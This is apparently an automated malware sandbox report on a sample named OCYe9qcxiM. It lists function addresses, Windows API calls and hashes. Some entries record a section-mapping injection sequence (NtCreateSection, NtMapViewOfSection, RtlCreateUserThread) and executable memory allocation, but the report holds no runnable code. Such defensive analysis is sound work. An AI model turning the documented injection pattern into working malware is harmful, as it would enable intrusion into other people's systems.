Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 007923F9 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0079244A

Memory Dump Source

Source File: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f000_OCYe9qcxiM.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 67ab49b15a43d2636405130e0a9947d3d1c36f0e506a76c19434085e327be286
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D2113C79A00208FFDB01DF98C985E98BBF5AF08350F158094F9489B362D775EA50DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00418910 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00514D6C,00418FA2), ref: 00418918

Memory Dump Source

Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
Instruction ID: 452ad643668a9869e20cf026667031a7807d1b47aa2963159c3e27e96442b96b
Opcode Fuzzy Hash: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
Instruction Fuzzy Hash: F0B012B094A2009FDB00CF90FC44B903BB4F358702F00D061F500C1160D7304404EF16

Non-executed Functions

Function 0216092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0216095F
l, xrefs: 02160966
GetProcAddress., xrefs: 021609DC, 021609DF, 021609E4

Memory Dump Source

Source File: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2160000_OCYe9qcxiM.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 9d09f4bf71310db208545c88e6d1876d258cb477de8417cdf57686ef8e2b68ec
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: C33168B6900609CFDB10CF99C884BAEBBFAFF08324F15414AD845A7310D7B1EA55CBA4

Function 00792017 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f000_OCYe9qcxiM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 52b550a6fe06e297e6414a7b6fa7b4c6f09a102240cad841e670b81355821738
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 6F116572740100AFDB54DF59ECC1FA673EAEB89320B298155ED05CB356E67AEC42C760

Function 02160D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2160000_OCYe9qcxiM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8aefb2e03bfe832e8c935329caa654c986fc1f0a6ad12d7bc440d1f32141431e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0001F272A506008FDF21CF64C808BBE33E5FB8A206F1541A8D90B97281E370A851CB80

Function 0040324F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2828c34342f3815c3a081a3e232e5bf3c7d5b66456e8337138159d3dab8dfd4a
Instruction ID: b9232dddd9ee29daca17cdcb62ceace461c000e746484e610e32f03e96d1e91f
Opcode Fuzzy Hash: 2828c34342f3815c3a081a3e232e5bf3c7d5b66456e8337138159d3dab8dfd4a
Instruction Fuzzy Hash: 43F0A46010D6819BD70A4F295849A32AE5C6F1635773400FF8483751C3D23D9B06A25F

Function 00403277 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b4c3a10474be77627dd7ffc6b477ca949237bb5390a61aa1a28c39769f84d6
Instruction ID: d1b8e31bddeb2f7b6042b6099c65d61f305dd5db917431d595f2b01c6c23c79b
Opcode Fuzzy Hash: 63b4c3a10474be77627dd7ffc6b477ca949237bb5390a61aa1a28c39769f84d6
Instruction Fuzzy Hash: 2AF0286051D6829FDB064F246849622AF5C7B17367B2800FFD082751C2D23D4703524F

Function 00403256 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae2540cb9c86968295ecba8107e2f6a9a5581a42c82d6f017583cd200ad5459
Instruction ID: cd2a5714165b29a814f6ac358bf4ae572c67f0cbec0d0585c5c9e05d2ef64f4e
Opcode Fuzzy Hash: cae2540cb9c86968295ecba8107e2f6a9a5581a42c82d6f017583cd200ad5459
Instruction Fuzzy Hash: F7F0246051C6429BDB0A4F20A849B22BE9C6A05327B2800FF94827A2C6D27D5707624F

Function 00403247 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a9bbcbe20a561799d741479fe956cd9d64513df161fe16a55e3be2a286ad20
Instruction ID: 841a20fc3ad8dda8eaf68fd6d7690e010f869272b20976cef6142a2bb287e419
Opcode Fuzzy Hash: 17a9bbcbe20a561799d741479fe956cd9d64513df161fe16a55e3be2a286ad20
Instruction Fuzzy Hash: 95F059A000C281DBCB095F246849A32AE9C6F0631BB3800FFC483B91C3D13E9B07A24F

Function 0040326C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e5e6fc283191548cf4b126092c7b085b7b2bf72b55aa16d0ab73a897bcf3586
Instruction ID: cca6bdd2ccee7e980bcbfdfdf0824053d034a4cd0fab719316bdbfef4302d11e
Opcode Fuzzy Hash: 9e5e6fc283191548cf4b126092c7b085b7b2bf72b55aa16d0ab73a897bcf3586
Instruction Fuzzy Hash: 2BF05C6140C2418BDB154F106D896227F8CAB0671BB2400FF8442791C3E13D4706934F

Function 00403290 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b5b9465f207d8d33be367c208e7fcc32e9a6624e169b0ee07fb584f3c5f3f5
Instruction ID: 51d28d607b2bf0c6be485ba67b57a1d92e8d7f3091ffbd4f6d5742e632961af3
Opcode Fuzzy Hash: b2b5b9465f207d8d33be367c208e7fcc32e9a6624e169b0ee07fb584f3c5f3f5
Instruction Fuzzy Hash: 75F0559151C3804BC7616F309889752BFA8AF273AAB1880FF8441A92C3F03E4E06C30F

Function 0040327D Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d352eaf029c9311bb01c48030991ac49a0b170cda5c36220cdf8f8a41f6a56c1
Instruction ID: 973bb0815bb9229e93df1df71aa6ae32e96e2be28a84a13a50005fc9370f71b1
Opcode Fuzzy Hash: d352eaf029c9311bb01c48030991ac49a0b170cda5c36220cdf8f8a41f6a56c1
Instruction Fuzzy Hash: C2E02260008A805BC7165F24A989622AF9C6B0A71BB0840FF8481A92C3D12D4A06834F

Function 00418B20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00418B34
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418B46
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
OpenJobObjectA.KERNEL32(00000000,00000000,0041B388), ref: 00418B9E
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0

Strings

-, xrefs: 00418BBD

Memory Dump Source

Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd

Similarity

API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
String ID: -
API String ID: 2332831159-2547889144
Opcode ID: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
Instruction ID: 677527fee2e31da48b0f78a64988b8bc3df04c21d5f76ad85ec8a00fc73180d6
Opcode Fuzzy Hash: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
Instruction Fuzzy Hash: 94116B71A49304BBE7209FA0EC46FEA3F74AB08B11F204129FB04691C1CAB82981875F

Function 00418B56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
OpenJobObjectA.KERNEL32(00000000,00000000,0041B388), ref: 00418B9E
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0

Strings

-, xrefs: 00418BBD

Memory Dump Source

Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd

Similarity

API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
String ID: -
API String ID: 1414951042-2547889144
Opcode ID: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
Instruction ID: 0a3812f3688d595350d52c489f49ccd1e134694a55c2d67ff5c1230b235e6e50
Opcode Fuzzy Hash: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
Instruction Fuzzy Hash: B4F0C871B85304ABD7208F94EC46BD97B60FB09725F214259F6046E1C1C7B52951DB8B

Function 00418BE0 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(0041B398,?,00000000), ref: 00418C17
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418C32
HeapDestroy.KERNEL32(00000000), ref: 00418C51
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418C60

Memory Dump Source

Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 1a1355a4214cf67f46c550b7ed4b3c0a02d7eb781624a2e4aa6250646aa1c127
Instruction ID: 756bc8bfdf9d8d10eb6f9b921beda427f38e019a2e514af8c0d7042b50038681
Opcode Fuzzy Hash: 1a1355a4214cf67f46c550b7ed4b3c0a02d7eb781624a2e4aa6250646aa1c127
Instruction Fuzzy Hash: E901D8B4A012049BCB20AF64ED45BDA3778EB18745F40407BFB05A7290DE345984CFAA

Analysis Process: hehcrfbPID: 7748, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	28.8%
Signature Coverage:	0%
Total number of Nodes:	170
Total number of Limit Nodes:	6

Executed Functions

Function 00418C80 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 310
libraryfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D9B
SetFocus.USER32(00000000), ref: 00418DA4
ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418DAF
FindAtomW.KERNEL32(00000000), ref: 00418DB6
SearchPathA.KERNEL32(0041B3E4,0041B3CC,0041B3B8,00000000,?,?), ref: 00418DDA
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418DE2
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418DFA
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418E21
CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418E2D
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418E43
GetEnvironmentStringsW.KERNEL32 ref: 00418E49
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418E8E
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418E9D
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418EA6
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418EBB
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418ECC
SetCommMask.KERNELBASE(00000000,00000000), ref: 00418EF5
GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418F0B
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418F3A
GetComputerNameW.KERNEL32(?,?), ref: 00418F4E
GetConsoleAliasExesLengthW.KERNEL32 ref: 00418F54
GetBinaryType.KERNEL32(0041B3F0,?), ref: 00418F66
PurgeComm.KERNEL32(00000000,00000000), ref: 00418F6E
LoadLibraryA.KERNELBASE(0041B410), ref: 00418FE2
MoveFileW.KERNEL32(00000000,00000000), ref: 00419017
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041903E

Strings

}$, xrefs: 00419045
k`, xrefs: 0041901D

Memory Dump Source

Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd

Similarity

API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
String ID: k`$}$
API String ID: 87775671-956986773
Opcode ID: c8a4e5b77a3355490554213bf8507c2ed9d8cb568ec84c329371616b9184d7c2
Instruction ID: cec1c0038aff85c57551383c5b233afae2bf81415c058cacd0026c3a6edaf131
Opcode Fuzzy Hash: c8a4e5b77a3355490554213bf8507c2ed9d8cb568ec84c329371616b9184d7c2
Instruction Fuzzy Hash: 02B1B671901224ABCB219F61DC44BDF7B79EF5D714F00806AF609A71A1DB381A85CFAE

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 005F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005F024D

Strings

cess, xrefs: 005F018D
kernel32.dll, xrefs: 005F008F, 005F0095

Memory Dump Source

Source File: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5f0000_hehcrfb.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4b65ce4eff50f675edf1d61a99df40599f3613a345a7b7b0bfdd16d4a1f72893
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B9526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB392DB34AE85DF14

Function 00418940 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
